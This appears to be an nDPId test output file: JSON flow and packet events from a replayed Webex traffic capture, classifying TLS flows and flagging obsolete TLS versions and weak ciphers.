+00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":218,"source":"webex.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":1444570633357,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1444570633357,"pkt":"ABoRAAACABoRAAABCABFAAA87DBAAEAGmtcKCAABQERpZ6GOAbtaKC3iAAAAAKACOQht0gAAAgQFtAQCCAoATMHSAAAAAAEDAwY="} +00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":219,"source":"webex.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":2,"flow_last_seen":1444570633360,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570633360,"pkt":"ABoRAAACABoRAAABCABFAAAoAXpAABAGtaJARGlnCggAAQG7oY6l19IdWigt41AS\/\/9Y1AAA"} +00448{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":220,"source":"webex.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":3,"flow_last_seen":1444570633360,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570633360,"pkt":"ABoRAAACABoRAAABCABFAAAo7DFAAEAGmuoKCAABQERpZ6GOAbtaKC3jpdfSHlAQOQgfzQAA"} +00938{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":221,"source":"webex.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570633357,"flow_last_seen":1444570633362,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":15,"midstream":0,"thread_ts_msec":1444570633362,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.103","src_port":41358,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +01401{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":225,"source":"webex.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1444570633357,"flow_last_seen":1444570633811,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2579,"flow_tot_l4_payload_len":4002,"flow_avg_l4_payload_len":500,"midstream":0,"thread_ts_msec":1444570633811,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.103","src_port":41358,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.webex.com","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"91589ea825a2ee41810c85fab06d2ef6","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=us, ST=California, L=San Jose, O=Cisco Systems, Inc., OU=CSG, CN=*.webex.com","fingerprint":"61:C9:DE:EE:FA:AE:DC:17:A0:36:B9:68:F9:17:F6:5A:90:7B:14:E1"}} +00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":256,"source":"webex.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1444570636151,"flow_last_seen":1444570636151,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1444570636151,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"114.29.213.212","src_port":41726,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":256,"source":"webex.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":1,"flow_last_seen":1444570636151,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1444570636151,"pkt":"ABoRAAACABoRAAABCABFAAA8tbVAAEAGMwwKCAABch3V1KL+AbsYGndcAAAAAKACOQjFmAAAAgQFtAQCCAoATMLpAAAAAAEDAwY="} +00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":257,"source":"webex.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":2,"flow_last_seen":1444570636154,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570636154,"pkt":"ABoRAAACABoRAAABCABFAAAoAY1AABAGF0lyHdXUCggAAQG7ov7n5YijGBp3XVAS\/\/+5HQAA"} +00449{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":258,"source":"webex.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":3,"flow_last_seen":1444570636154,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570636154,"pkt":"ABoRAAACABoRAAABCABFAAAotbZAAEAGMx8KCAABch3V1KL+AbsYGndd5+WIpFAQOQiAFgAA"} +00572{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":259,"source":"webex.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1444570636155,"flow_last_seen":1444570636155,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1444570636155,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"114.29.204.49","src_port":51646,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":259,"source":"webex.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":1,"flow_last_seen":1444570636155,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1444570636155,"pkt":"ABoRAAACABoRAAABCABFAAA8NxlAAEAGu0sKCAABch3MMcm+AbvkVPXwAAAAAKACOQhdrAAAAgQFtAQCCAoATMLpAAAAAAEDAwY="} +00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":260,"source":"webex.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":2,"flow_last_seen":1444570636157,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570636157,"pkt":"ABoRAAACABoRAAABCABFAAAoAY5AABAGIOtyHcwxCggAAQG7yb4bqwoP5FT18VAS\/\/+cAAAA"} +00940{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":261,"source":"webex.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570636151,"flow_last_seen":1444570636157,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":15,"midstream":0,"thread_ts_msec":1444570636157,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"114.29.213.212","src_port":41726,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +00449{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":263,"source":"webex.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":3,"flow_last_seen":1444570636158,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570636158,"pkt":"ABoRAAACABoRAAABCABFAAAoNxpAAEAGu14KCAABch3MMcm+AbvkVPXxG6sKEFAQOQhi+QAA"} +00939{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":264,"source":"webex.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570636155,"flow_last_seen":1444570636159,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":15,"midstream":0,"thread_ts_msec":1444570636159,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"114.29.204.49","src_port":51646,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":266,"source":"webex.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1444570636160,"flow_last_seen":1444570636160,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1444570636160,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"209.197.222.159","src_port":47498,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":266,"source":"webex.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":1,"flow_last_seen":1444570636160,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1444570636160,"pkt":"ABoRAAACABoRAAABCABFAAA80GxAAEAGr+EKCAAB0cXen7mKAbt7nBKGAAAAAKACOQhH7AAAAgQFtAQCCAoATMLqAAAAAAEDAwY="} +00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":267,"source":"webex.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":2,"flow_last_seen":1444570636163,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570636163,"pkt":"ABoRAAACABoRAAABCABFAAAoAZFAABAGrtHRxd6fCggAAQG7uYqEY+15e5wSh1AS\/\/86HgAA"} +00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":268,"source":"webex.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":3,"flow_last_seen":1444570636163,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570636163,"pkt":"ABoRAAACABoRAAABCABFAAAo0G1AAEAGr\/QKCAAB0cXen7mKAbt7nBKHhGPtelAQOQgBFwAA"} +00941{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":269,"source":"webex.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570636160,"flow_last_seen":1444570636164,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":15,"midstream":0,"thread_ts_msec":1444570636164,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"209.197.222.159","src_port":47498,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +00572{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":271,"source":"webex.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1444570636170,"flow_last_seen":1444570636170,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1444570636170,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.121.153","src_port":57647,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":271,"source":"webex.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":1,"flow_last_seen":1444570636170,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1444570636170,"pkt":"ABoRAAACABoRAAABCABFAAA8c99AAEAGAvcKCAABQER5meEvAbvnI7E0AAAAAKACOQgMmAAAAgQFtAQCCAoATMLrAAAAAAEDAwY="} +00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":272,"source":"webex.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":2,"flow_last_seen":1444570636175,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570636175,"pkt":"ABoRAAACABoRAAABCABFAAAoAZNAABAGpVdARHmZCggAAQG74S8Y3E7L5yOxNVAS\/\/8JAQAA"} +00449{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":273,"source":"webex.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":3,"flow_last_seen":1444570636175,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570636175,"pkt":"ABoRAAACABoRAAABCABFAAAoc+BAAEAGAwoKCAABQER5meEvAbvnI7E1GNxOzFAQOQjP+QAA"} +00939{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":274,"source":"webex.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570636170,"flow_last_seen":1444570636176,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":15,"midstream":0,"thread_ts_msec":1444570636176,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.121.153","src_port":57647,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +00571{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":276,"source":"webex.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1444570636180,"flow_last_seen":1444570636180,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1444570636180,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"62.109.231.3","src_port":45814,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":276,"source":"webex.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":1,"flow_last_seen":1444570636180,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1444570636180,"pkt":"ABoRAAACABoRAAABCABFAAA8nw9AAEAGbDMKCAABPm3nA7L2AbufQl3jAAAAAKACOQhqbwAAAgQFtAQCCAoATMLsAAAAAAEDAwY="} +00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":277,"source":"webex.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":2,"flow_last_seen":1444570636183,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570636183,"pkt":"ABoRAAACABoRAAABCABFAAAoAZVAABAGOcI+becDCggAAQG7svZgvaIcn0Jd5FAS\/\/\/LpgAA"} +00449{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":278,"source":"webex.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":3,"flow_last_seen":1444570636183,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570636183,"pkt":"ABoRAAACABoRAAABCABFAAAonxBAAEAGbEYKCAABPm3nA7L2AbufQl3kYL2iHVAQOQiSnwAA"} +00938{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":279,"source":"webex.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570636180,"flow_last_seen":1444570636185,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":15,"midstream":0,"thread_ts_msec":1444570636185,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"62.109.231.3","src_port":45814,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +00572{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":281,"source":"webex.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1444570636248,"flow_last_seen":1444570636248,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1444570636248,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.104.140","src_port":44492,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":281,"source":"webex.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":1,"flow_last_seen":1444570636248,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1444570636248,"pkt":"ABoRAAACABoRAAABCABFAAA8NIdAAEAGU1wKCAABQERojK3MAbt5hvZ2AAAAAKACOQh5XQAAAgQFtAQCCAoATMLxAAAAAAEDAwY="} +00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":282,"source":"webex.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":2,"flow_last_seen":1444570636252,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570636252,"pkt":"ABoRAAACABoRAAABCABFAAAoAZdAABAGtmBARGiMCggAAQG7rcyGeQmJeYb2d1AS\/\/9NcQAA"} +00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":283,"source":"webex.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1444570636252,"flow_last_seen":1444570636252,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1444570636252,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"114.29.202.139","src_port":47116,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":283,"source":"webex.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":1,"flow_last_seen":1444570636252,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1444570636252,"pkt":"ABoRAAACABoRAAABCABFAAA80SxAAEAGIt4KCAABch3Ki7gMAbtSShPdAAAAAKACOQjlGgAAAgQFtAQCCAoATMLxAAAAAAEDAwY="} +00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":284,"source":"webex.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":2,"flow_last_seen":1444570636255,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570636255,"pkt":"ABoRAAACABoRAAABCABFAAAoAZhAABAGIodyHcqLCggAAQG7uAyttewiUkoT3lAS\/\/+vWAAA"} +00571{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":285,"source":"webex.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1444570636255,"flow_last_seen":1444570636255,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1444570636255,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"173.243.4.76","src_port":52730,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":285,"source":"webex.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":1,"flow_last_seen":1444570636255,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1444570636255,"pkt":"ABoRAAACABoRAAABCABFAAA870JAAEAGjzEKCAABrfMETM36AbsKei2zAAAAAKACOQiHkAAAAgQFtAQCCAoATMLxAAAAAAEDAwY="} +00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":286,"source":"webex.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":2,"flow_last_seen":1444570636259,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570636259,"pkt":"ABoRAAACABoRAAABCABFAAAoAZlAABAGrO+t8wRMCggAAQG7zfr1hdJMCnottFAS\/\/8j1AAA"} +00572{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":287,"source":"webex.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1444570636259,"flow_last_seen":1444570636259,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1444570636259,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.121.100","src_port":52219,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":287,"source":"webex.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":1,"flow_last_seen":1444570636259,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1444570636259,"pkt":"ABoRAAACABoRAAABCABFAAA8u9ZAAEAGuzQKCAABQER5ZMv7AbtwVXkkAAAAAKACOQjQ2AAAAgQFtAQCCAoATMLyAAAAAAEDAwY="} +00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":288,"source":"webex.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":2,"flow_last_seen":1444570636263,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570636263,"pkt":"ABoRAAACABoRAAABCABFAAAoAZpAABAGpYVARHlkCggAAQG7y\/uPqobbcFV5JVAS\/\/8eagAA"} +00571{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":289,"source":"webex.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1444570636264,"flow_last_seen":1444570636264,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1444570636264,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.121.99","src_port":55969,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":289,"source":"webex.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":1,"flow_last_seen":1444570636264,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1444570636264,"pkt":"ABoRAAACABoRAAABCABFAAA8YelAAEAGFSMKCAABQER5Y9qhAbtb96MaAAAAAKACOQismgAAAgQFtAQCCAoATMLzAAAAAAEDAwY="} 